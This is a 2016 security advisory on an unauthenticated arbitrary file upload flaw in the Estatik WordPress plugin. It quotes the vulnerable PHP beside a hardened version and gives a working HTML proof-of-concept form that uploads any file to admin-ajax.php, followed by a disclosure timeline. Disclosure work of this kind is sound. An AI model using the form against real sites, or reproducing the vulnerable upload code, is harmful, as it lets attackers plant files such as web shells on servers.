1 Aug 2016

Arbitrary File Upload Vulnerability in Estatik

As we continue to review old third-party data on hacking attempts to identify more vulnerabilities that hackers have likely already discovered in WordPress plugins, we spotted an arbitrary file upload vulnerability in the plugin Estatik.

Back in June of last year a request was made for the file /wp-content/plugins/estatik/front_templates/css/es_front_responsive.css, which was likely a probe for usage of the plugin before exploiting it. Looking over that plugin for any obvious issues, we found that in the current version of it, 2.2.5, a file upload capability is accessible without being logged in, despite only being intended to be accessed by users logged in as Administrators.

The issue starts with the function es_prop_media_images() being made accessible through WordPress AJAX functionality to those not logged in (in the file /admin_template/es_property/es_property_functions.php):

add_action('wp_ajax_nopriv_es_prop_media_images', 'es_prop_media_images');

In that function the following code saves an uploaded file sent with a request to the AJAX function, with no check of who sent it or what type of file it is:

// file name: Unix timestamp, "_", then the client-supplied name, unchanged
$image_name = time()."_".$_FILES['es_media_images']['name'][$i];
$sourcePath = $_FILES['es_media_images']['tmp_name'][$i];
// destination: the current month's directory under /wp-content/uploads/
$targetPath = $upload_dir['path']."/".$image_name;
move_uploaded_file($sourcePath, $targetPath);
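To make the fix concrete, here is the exposed registration beside one hardened form of the handler. This is an added example and not the plugin's own code; the hardened function name, the nonce action name and the allowed-type list are assumptions.

```php
<?php
// Added example, not code from the Estatik plugin. Names other than
// es_prop_media_images are hypothetical.

// VULNERABLE PATTERN: the "nopriv" hook runs the handler for visitors who
// are not logged in at all, and the handler does no checks of its own.
add_action('wp_ajax_nopriv_es_prop_media_images', 'es_prop_media_images');

// HARDENED PATTERN (assumed names): register only the authenticated hook,
// then verify capability, nonce and file type before touching the disk.
add_action('wp_ajax_es_prop_media_images', 'es_prop_media_images_hardened');

function es_prop_media_images_hardened() {
    // 1. Authorization: only users allowed to upload files may proceed.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }
    // 2. CSRF: the request must carry a nonce issued for this action.
    check_ajax_referer('es_prop_media_images', 'nonce');

    if (empty($_FILES['es_media_images']['name'])) {
        wp_send_json_error('no file', 400);
    }

    require_once ABSPATH . 'wp-admin/includes/file.php';
    $saved = array();
    foreach ($_FILES['es_media_images']['name'] as $i => $name) {
        $file = array(
            'name'     => $name,
            'type'     => $_FILES['es_media_images']['type'][$i],
            'tmp_name' => $_FILES['es_media_images']['tmp_name'][$i],
            'error'    => $_FILES['es_media_images']['error'][$i],
            'size'     => $_FILES['es_media_images']['size'][$i],
        );
        // 3. File-type validation: wp_handle_upload() checks the extension
        //    and MIME type against the list given here, sanitizes the file
        //    name and calls move_uploaded_file() itself.
        $result = wp_handle_upload($file, array(
            'test_form' => false,
            'mimes'     => array('jpg|jpeg' => 'image/jpeg',
                                 'png' => 'image/png', 'gif' => 'image/gif'),
        ));
        if (isset($result['error'])) {
            wp_send_json_error($result['error'], 400);
        }
        $saved[] = $result['url'];
    }
    wp_send_json_success($saved);
}
```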

Proof of Concept

The following proof of concept will upload the selected file and put it in the current month's directory inside of the /wp-content/uploads/ directory. The name of the file in the upload directory will be the time the file was saved as output by the function time(), followed by a "_" and then the name of the file as it was uploaded.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" /> 
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 7/25/2016 – Developer notified.
  • 8/1/2016 – WordPress.org Plugin Directory notified.
  • 8/1/2016 – WordPress.org Plugin Directory removes plugin.
  • Week of 8/14/2016 – Version 2.3.0 released, which fixes vulnerability, but leaves a lesser vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
